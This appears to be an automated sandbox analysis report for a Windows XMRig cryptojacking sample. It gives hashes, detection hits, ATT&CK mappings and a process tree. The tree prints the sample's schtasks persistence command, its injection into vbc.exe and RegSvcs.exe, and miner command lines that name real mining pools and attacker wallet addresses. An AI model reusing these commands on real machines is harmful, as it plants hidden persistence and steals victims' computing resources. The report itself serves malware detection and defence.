xmrig | 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

Analysis

max time kernel
23s
max time network
27s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
12/03/2023, 05:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Size

903KB
MD5

7b205c65f9092ee01c821aa5b58bcc6b
SHA1

28f2aeded861c37d6fd90ddb791721a653079cfb
SHA256

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA512

1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
SSDEEP

12288:8D5lJ0RelUsuvM/vPmyTIPjdgRSzYr9MUlu1vZdptUG5decIljrG:8D5lWYlUsuvMH+36e70

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/memory/932-80-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-81-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-82-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-83-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-84-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-85-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-86-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-87-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-89-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-91-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-95-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/932-96-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
1520	Y.exe

Loads dropped DLL 1 IoCs

pid	Process
956	cmd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1700-101-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1700-102-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1700-104-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1700-105-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1700-106-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1520 set thread context of 932	1520	Y.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1768	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
948	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1520	Y.exe
1520	Y.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1076	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Token: SeDebugPrivilege	1520	Y.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1076 wrote to memory of 956	1076	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	26
PID 1076 wrote to memory of 956	1076	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	26
PID 1076 wrote to memory of 956	1076	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	26
PID 956 wrote to memory of 948	956	cmd.exe	28
PID 956 wrote to memory of 948	956	cmd.exe	28
PID 956 wrote to memory of 948	956	cmd.exe	28
PID 956 wrote to memory of 1520	956	cmd.exe	29
PID 956 wrote to memory of 1520	956	cmd.exe	29
PID 956 wrote to memory of 1520	956	cmd.exe	29
PID 1520 wrote to memory of 1660	1520	Y.exe	30
PID 1520 wrote to memory of 1660	1520	Y.exe	30
PID 1520 wrote to memory of 1660	1520	Y.exe	30
PID 1660 wrote to memory of 1768	1660	cmd.exe	32
PID 1660 wrote to memory of 1768	1660	cmd.exe	32
PID 1660 wrote to memory of 1768	1660	cmd.exe	32
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34
PID 1520 wrote to memory of 932	1520	Y.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
"C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp70BE.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:948
- - C:\ProgramData\telemetry\Y.exe
    "C:\ProgramData\telemetry\Y.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1660
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1768
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:932
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 0
      4⤵
      PID:1700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp70BE.tmp.bat

Filesize
139B

MD5
9cc9e1891d088630a6cf2826cafb7262

SHA1
3cb449c42e64f8e942f06de77cf3ac94d85384b2

SHA256
36d45d364d344db819bdfb6efd3a4b6da440d031a67743e65a4d3937541f23d1

SHA512
76a1f1d03a07de94715a3b638d109cc1ff0681aee1742254ba602d95707053a1fa300abf21265e67350d7dbf374c86f653a89b9ec830ab41168f15d349401c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp70BE.tmp.bat

Filesize
139B

MD5
9cc9e1891d088630a6cf2826cafb7262

SHA1
3cb449c42e64f8e942f06de77cf3ac94d85384b2

SHA256
36d45d364d344db819bdfb6efd3a4b6da440d031a67743e65a4d3937541f23d1

SHA512
76a1f1d03a07de94715a3b638d109cc1ff0681aee1742254ba602d95707053a1fa300abf21265e67350d7dbf374c86f653a89b9ec830ab41168f15d349401c6a

Download Submit
\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
memory/932-95-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-88-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

Filesize
4KB

Download
memory/932-96-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-77-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-78-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-79-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-80-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-81-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-82-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-83-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-84-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-85-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-86-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-87-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-94-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/932-89-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/932-91-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-64-0x000000001BC90000-0x000000001BD10000-memory.dmp

Filesize
512KB

Download
memory/1076-54-0x0000000000E20000-0x0000000000F06000-memory.dmp

Filesize
920KB

Download
memory/1520-73-0x000000001BD90000-0x000000001BE10000-memory.dmp

Filesize
512KB

Download
memory/1520-70-0x00000000002E0000-0x00000000003C6000-memory.dmp

Filesize
920KB

Download
memory/1520-98-0x000000001BD90000-0x000000001BE10000-memory.dmp

Filesize
512KB

Download
memory/1700-100-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1700-101-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1700-102-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1700-103-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1700-104-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1700-105-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1700-106-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download